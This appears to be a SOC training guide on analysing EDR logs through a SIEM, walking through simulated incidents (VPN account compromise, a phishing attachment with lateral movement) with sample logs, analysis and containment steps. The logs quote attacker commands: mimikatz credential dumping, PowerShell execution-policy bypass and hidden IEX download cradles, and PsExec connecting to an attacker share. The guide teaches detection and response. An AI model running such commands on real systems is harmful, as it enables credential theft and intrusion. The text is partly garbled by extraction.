• Timestamp: 29-08-2024 18:27:40 UTC
• User: izzmier
• Process: mimikatz.exe
• CommandLine: mimikatz.exe privilege::debug sekurlsa::logonpasswords
• Action: Allowed
• Timestamp: 29-08-2024 18:30:00 UTC
• Alert Name: Unauthorised Access Detected via VPN Connection
• Source: VPN Logs
• AZected Hosts: WIN-SERVER-15
• Correlated Threat ID: EDR-90876, EDR-90877
• Correlation Rule: Detect suspicious VPN access followed by abnormal

activities on connected endpoints
• Severity: High
Analysis:

The SIEM alert "Unauthorised Access Detected via VPN Connection" is flagged
as High, indicating a potential security breach. The source is VPN logs showing a
connection from an unusual location, followed by suspicious activity on an
internal server.

The alert aggregates two EDR events involving the execution of potentially
malicious PowerShell and Mimikatz processes on the connected endpoint, WIN-
SERVER-15.
o Log Entry 1: powershell.exe -ExecutionPolicy Bypass -File "Invoke-

DataExfiltration.ps1"was executed on WIN-SERVER-15 by user izzmier.
This command suggests that a script intended for data exfiltration was
executed, which is a significant red flag.
o Log Entry 2: mimikatz.exe privilege::debug sekurlsa::logonpasswords was

executed on the same server by the same user, indicating an attempt to
dump credentials using a well-known post-exploitation tool, Mimikatz.
• Correlate with Authentication Logs:
o Timestamp: 29-08-2024 18:18:00 UTC
o Source IP: 203.0.113.100 (Unusual Location)
o Destination: Corporate Network
o User: izzmier
o Action: Successful Login
o Event ID: AUTH-6789

The authentication log confirms that the izzmier account was used to
successfully log in from an unusual geographic location, reinforcing the
suspicion of account compromise.
• Check Data Transfer Logs:
o Timestamp: 29-08-2024 18:28:30 UTC

o Protocol: FTP
o Action: Data Transfer

The data transfer log shows a significant amount of data being transferred
from WIN-SERVER-15 to an external IP, which could be an indication of
data exfiltration.
• Terminate VPN Session: Immediately disconnect the VPN session associated

with izzmier to prevent further unauthorised access.
• Isolate WIN-SERVER-15: Use the EDR platform to isolate WIN-SERVER-15 from

the network to prevent further malicious activity and potential data exfiltration.
• Block External IP: Block the external IP addresses (203.0.113.100 and

203.0.113.200) at the network perimeter firewall to prevent any further
communication or data transfer.
• Identify the Initial Compromise: Investigate how the izzmier account was
compromised, focusing on the possibility of credential theft or phishing.
• Examine Host Forensics: Analyse logs from WIN-SERVER-15 for additional

indicators of compromise (e.g., registry changes, persistence mechanisms,
other malicious tools) to understand the full scope of the attack.
o Incident Description: Unauthorised access detected via VPN, followed

by suspicious activities indicative of credential theft and potential data
exfiltration.
o AZected Account: izzmier (likely compromised).
o AZected Host: WIN-SERVER-15.
o Indicators of Compromise (IoCs): VPN connection from unusual

location, execution of Mimikatz and data exfiltration scripts.
o Containment Actions: Termination of VPN session, isolation of aEected

host, blocking of external IPs.
o Reset credentials for the compromised account (izzmier) and enforce
multi-factor authentication (MFA) for all VPN connections.
o Conduct a thorough audit of all accounts and logs to identify any further
unauthorised access or compromised accounts.
o Review and strengthen VPN access policies, ensuring geographic-based

access restrictions are in place.
o Provide additional training to users on recognising phishing attempts and

secure remote access practices.
Scenario 8: Malware Detected In Email Attachment With Lateral Movement
Overview: The SIEM system generates an alert indicating that malware was detected in
an email attachment. This was followed by suspicious lateral movement across
multiple endpoints, indicating the potential spread of the malware within the network.
The alert is correlated with EDR logs showing the execution of the malicious file and
subsequent unauthorised access attempts on other systems.
Alert Details:
• Alert Name: Malware Detected in Email Attachment with Lateral Movement
• Source: Email security gateway and EDR logs via SIEM integration
• Description: A malicious file was detected and executed from an email

attachment, leading to unauthorised access attempts on other networked
systems, indicating possible malware propagation.
• Time of Alert: 29-08-2024 15:15:00 UTC
Log Data:
Email Security Gateway Log Entry:
• Timestamp: 29-08-2024 15:00:00 UTC
• Sender: [email protected]
• Recipient: [email protected]
• Subject: Urgent: Invoice Due
• Attachment: Invoice_Due.docx (contains embedded malware)
• Action: Attachment Detected and Blocked
• Threat ID: EMAIL-56789
• Severity: High
EDR Log Entry 1:
• Timestamp: 29-08-2024 15:05:30 UTC
• Endpoint: WIN-CLIENT-01
• User: izzmier
• Process: winword.exe
• CommandLine: winword.exe /safe
"C:\Users\izzmier\Downloads\Invoice_Due.docx"
• Action: Allowed
• Detection Method: File Hash Analysis
• Severity: High
EDR Log Entry 2:
• Timestamp: 29-08-2024 15:08:45 UTC
• Endpoint: WIN-CLIENT-01
• User: izzmier
• CommandLine: powershell.exe -ExecutionPolicy Bypass -File

"C:\Temp\payload.ps1"
• Action: Allowed
EDR Log Entry 3:
• Timestamp: 29-08-2024 15:12:20 UTC
• User: izzmier
• Process: psexec.exe
• CommandLine: psexec.exe \WIN-SERVER-03 -u admin -p password123 cmd.exe

/c "net use z: \attacker\share"
• Action: Allowed

• Timestamp: 29-08-2024 15:15:00 UTC
• Alert Name: Malware Detected in Email Attachment with Lateral Movement
• Source: Email Security Gateway and EDR Logs
• AZected Hosts: WIN-CLIENT-01, WIN-SERVER-03
• Correlation Rule: Detect malicious file execution and subsequent suspicious

activities indicative of lateral movement
Analysis:

The SIEM alert "Malware Detected in Email Attachment with Lateral Movement"
is flagged as Critical, signalling a potentially severe security incident. The alert
originates from a combination of email security and EDR logs, indicating that a
malicious attachment was executed, followed by suspicious lateral movement.

The alert aggregates three EDR events, each involving the execution of potentially
malicious processes and unauthorised access attempts across two endpoints
(WIN-CLIENT-01 and WIN-SERVER-03).
o Log Entry 1: winword.exe /safe

"C:\Users\izzmier\Downloads\Invoice_Due.docx" was executed on WIN-
CLIENT-01 by user izzmier. This indicates that the user opened the
malicious document, which likely triggered the malware execution.
o Log Entry 2: powershell.exe -ExecutionPolicy Bypass -File

"C:\Temp\payload.ps1" suggests that a PowerShell script was executed,
likely as part of the malware’s payload to perform further malicious
actions.
o Log Entry 3: psexec.exe \\WIN-SERVER-03 -u admin -p password123

cmd.exe /c "net use z: \\attacker\share" was executed, indicating that the
malware attempted to use PsExec to spread to another server and
connect to an external malicious share.
• Correlate with Email Logs:
o Timestamp: 29-08-2024 15:00:00 UTC
o Sender: [email protected]
o Recipient: [email protected]
o Subject: Urgent: Invoice Due
o Attachment: Invoice_Due.docx
o Action: Attachment Blocked (though likely bypassed)

The email log confirms that the malware originated from a spear-phishing
email targeting izzmier.
• Check Network TraZic Logs:
o Timestamp: 29-08-2024 15:10:30 UTC
o Source IP: 192.168.50.10 (WIN-CLIENT-01)
o Protocol: SMB
o Action: Data Transfer Attempted

The network traEic log shows an attempted connection to an external IP,
indicating that the malware might have tried to exfiltrate data.
• Isolate AZected Hosts: Use the EDR platform to immediately isolate WIN-
CLIENT-01 and WIN-SERVER-03 from the network to prevent further spread of
the malware.
• Quarantine Malicious Files: Quarantine the malicious document

(Invoice_Due.docx) and the PowerShell script (payload.ps1) on all aEected
systems.
• Block External IP Addresses: Block the external IP address (203.0.113.200) at

the network perimeter firewall to prevent any potential data exfiltration.

• Identify the Initial Compromise: Investigate how the email security system
allowed the malicious attachment to reach the end user despite detection and
blocking attempts.
• Examine Host Forensics: Analyse the isolated systems for additional indicators
of compromise, including any persistence mechanisms, other malicious tools or
further compromised accounts.
o Incident Description: Malware detected in an email attachment, leading

to execution and lateral movement across networked systems.
o AZected Accounts: izzmier (used for malicious activities).
o AZected Hosts: WIN-CLIENT-01, WIN-SERVER-03.
o Indicators of Compromise (IoCs): Malicious document, PowerShell

script execution, unauthorised PsExec usage.
o Containment Actions: Isolation of aEected hosts, quarantine of

malicious files, blocking of external IP addresses.
o Review and update email security controls to prevent similar incidents in

the future.
o Provide security awareness training focused on recognising and reporting

phishing attempts.
o Conduct an organisation-wide audit for any additional infections or

compromised accounts.
o Implement stricter access controls for PowerShell execution and remote

administration tools like PsExec.

Analysing EDR Logs With SIEM Integration

Uploaded by

Copyright:

Available Formats

Analysing EDR Logs With SIEM Integration

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Analysing EDR Logs With SIEM Integration

Uploaded by

Copyright:

Available Formats

ANALYSING

EXAMPLES AND SIMULATIONS ............................................................................. 6

2. Integrate EDR Data Into SIEM

• Normalise and Correlate Data

• Enhance Alert Enrichment

3. Build Cross-Platform Detection Rules

• Leverage MITRE ATT&CK Framework

4. Develop An Integrated Incident Response Workﬂow

• Automate Response Actions

5. Centralise Threat Hunting And Investigation

• Drill Down with EDR

6. Enhance Reporting And Compliance

• Maintain Audit Trails

7. Continuous Improvement Through Feedback Loops

• Adapt to New Threats

• Regular Drills and Simulations

• Alert Name: Suspicious PowerShell Script Execution

• Source: EDR logs via SIEM integration

• Description: Multiple endpoints executed a suspicious PowerShell command

• Time of Alert: 29-08-2024 10:30:00 UTC

EDR Log Entry 1:

Timestamp: 29-08-2024 10:25:45 UTC

CommandLine: powershell.exe -nop -w hidden -c "IEX(New-Object

Detection Method: Script Analysis

Threat ID: EDR-5678

EDR Log Entry 2:

Timestamp: 29-08-2024 10:26:10 UTC

CommandLine: powershell.exe -nop -w hidden -c "IEX(New-Object

Detection Method: Behavioural Analysis

Threat ID: EDR-5679

EDR Log Entry 3:

Timestamp: 29-08-2024 10:26:30 UTC

CommandLine: powershell.exe -nop -w hidden -c "IEX(New-Object

Detection Method: Machine Learning

Threat ID: EDR-5680

SIEM Correlated Alert Log Entry:

Timestamp: 29-08-2024 10:30:00 UTC

Alert ID: SIEM-12345

Alert Name: Suspicious PowerShell Script Execution

Source: EDR Logs

AEected Hosts: WIN10-CLIENT01, WIN10-CLIENT02, WIN10-SERVER01

Correlated Threat ID: EDR-5678, EDR-5679, EDR-5680

Step 1: Initial Triage

• Check the Alert Details:

• Review Correlated Events:

Step 2: Investigate EDR Logs

• Examine the Command Line Field:

o Runs PowerShell in a non-interactive mode (-nop), hidden window (-w

o Uses the IEX (Invoke-Expression) command to execute a script directly

• Determine the Threat Source and Behaviour:

Step 3: Check for Additional Indicators

• Correlate with Other SIEM Data:

o Network TraZic: Look for outbound connections to suspicious IPs or

Example log entry from SIEM:

Timestamp: 29-08-2024 10:24:30 UTC

Source IP: 192.168.1.10 (WIN10-CLIENT01)

Destination IP: 203.0.113.15 (malicious-domain.com)

Threat Source: EDR Correlation

Event ID: NET-7890

Step 4: Take Containment Actions